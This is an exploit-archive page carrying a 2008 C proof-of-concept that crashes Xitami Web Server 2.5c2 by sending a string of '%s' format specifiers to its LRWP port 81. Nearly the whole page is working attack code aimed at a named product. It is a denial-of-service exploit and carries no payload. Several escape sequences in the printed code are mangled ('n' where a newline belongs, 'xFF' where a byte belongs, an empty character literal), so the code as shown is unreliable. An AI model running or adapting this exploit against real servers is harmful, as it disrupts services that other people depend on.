Xitami Web Server v2.5c2 LRWP Processing Format String PoC

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : Xitami Web Server v2.5c2 LRWP Processing Format String PoC
# Published : 2008-04-03
# Author : bratax
# Previous Title : Microsoft Visual InterDev 6.0 (SP6) SLN File Local Buffer Overflow PoC
# Next Title : Mcafee EPO 4.0 FrameworkService.exe Remote Denial of Service Exploit

/**
 *
 * PoC exploit for Xitami Web Server v2.5c2 LRWP processing format string bug
 * Advisory is available at: http://www.bratax.be/advisories/b013.html
 * (multiple vulnerabilities! check it out!)
 *
 * @author: bratax
 * @url: http://www.bratax.be/
 * @email: bratax@gmail.com
 *
 * Thanks to BuzzDee for learning me how to use reverse code engineering to
 * find bugs & thanks to DiabloHorn as well ;-)
 * Greetz to NR!
 *
**/

#include <stdio.h>
#include <string.h>
#include <winsock2.h>

#pragma comment(lib, "ws2_32.lib")
#define PORT 81 // target port

int main(int argc, char *argv[]){

  int sockfd;
  struct hostent *he;
  struct sockaddr_in their_addr;
  WSADATA wsaData;
  char formatstring[250];

  if (argc != 2){
    printf("nXitami Web Server 2.5c2n" );
    printf("Format String PoC by bratax - http://www.bratax.be/nn");
    printf("[+] tested on WinXP Pro SP2 & Vistan");
    printf("[+] usage: %s <hostname>nn", argv[0]);
    return -1;
  }

    if (WSAStartup(MAKEWORD(1, 1), &wsaData) != 0) {
    fprintf(stderr, "WSAStartup failed.n");
    return -1;
  }

  if ((he=gethostbyname(argv[1])) == NULL){  // get the host info
    perror("gethoscattbyname");
    return -1;
  }

  if ((sockfd = socket(AF_INET, SOCK_STREAM, 0)) == -1){
    perror("socket");
    return -1;
  }

  their_addr.sin_family = AF_INET;  // host byte order
  their_addr.sin_port = htons(PORT);  // short, network byte order
  their_addr.sin_addr = *((struct in_addr *)he->h_addr);
  memset(&(their_addr.sin_zero), '', 8); // zero the rest of the struct

  if (connect(sockfd, (struct sockaddr *)&their_addr,sizeof(struct sockaddr)) == -1){
    printf("[-] Connect failed.n");
    closesocket(sockfd);
    return -1;
  }

  printf("[+] Server is listening...n");

  Sleep(1000);

  /*
    setup format string request:
              %s*100 + xFF + somestring + xFF     (program termination)
    or:
              %n + xFF + somestring + xFF         (program crash)
  */

  memset(formatstring,'x41', sizeof(formatstring));
  for (int i = 0; i<200; i+=2){
    memcpy(formatstring+i, "%s", 2);
  }
  memcpy(formatstring+200, "xFF", 1);
  memcpy(formatstring+249, "xFF", 1);

  printf("[+] Sending format string request...");
  Sleep(2000);

  if (send(sockfd,formatstring,sizeof(formatstring),0) == -1) {
    Sleep(2000);
    printf("failed! Exiting...n");
    closesocket(sockfd);
    WSACleanup();
    return -1;
  }

  Sleep(2000);
  closesocket(sockfd);
  printf("done.n");


  return 0;
}

// www.Syue.com [2008-04-03]